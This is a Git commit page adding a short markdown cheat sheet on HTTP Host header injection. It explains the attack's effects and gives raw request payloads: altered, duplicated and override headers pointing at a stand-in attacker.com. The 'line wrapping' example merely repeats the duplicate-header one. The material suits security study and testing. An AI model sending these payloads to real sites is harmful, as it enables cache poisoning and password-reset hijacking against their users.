vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create Host Header Injection.md

Browse Source
This commit is contained in:
Mehdi 2023-10-30 11:41:53 +03:30 committed by GitHub
parent adbe71fa47
commit c57b445090
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 58 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
Host Header Injection.md Normal file
View File

@ -0,0 +1,58 @@
# Host Header Injection
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior.
### attacker can supply invalid input to cause the web server to:
* Dispatch requests to the first virtual host on the list.
* Perform a redirect to an attacker-controlled domain.
* Perform web cache poisoning.
* Manipulate password reset functionality.
* Allow access to virtual hosts that were not intended to be externally accessible.
## How to exploit
* Change the host header
```html
GET /example HTTP/1.1
Host: attacker.com
...
```
* Duplicating the host header
```html
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attacker.com
...
```
* Add line wrapping
```html
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attacker.com
...
```
* Add host override headers
```html
X-Forwarded-For: attacker.com
X-Forwarded-Host: attacker.com
X-Client-IP: attacker.com
X-Remote-IP: attacker.com
X-Remote-Addr: attacker.com
X-Host: attacker.com
Forwarded: attacker.com
# How to use? In this case im using "X-Forwarded-For : attacker.com"
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : attacker.com
...
# Supply an absolute URL
GET https://vulnerable-website.com/ HTTP/1.1
Host: attacker.com
...
```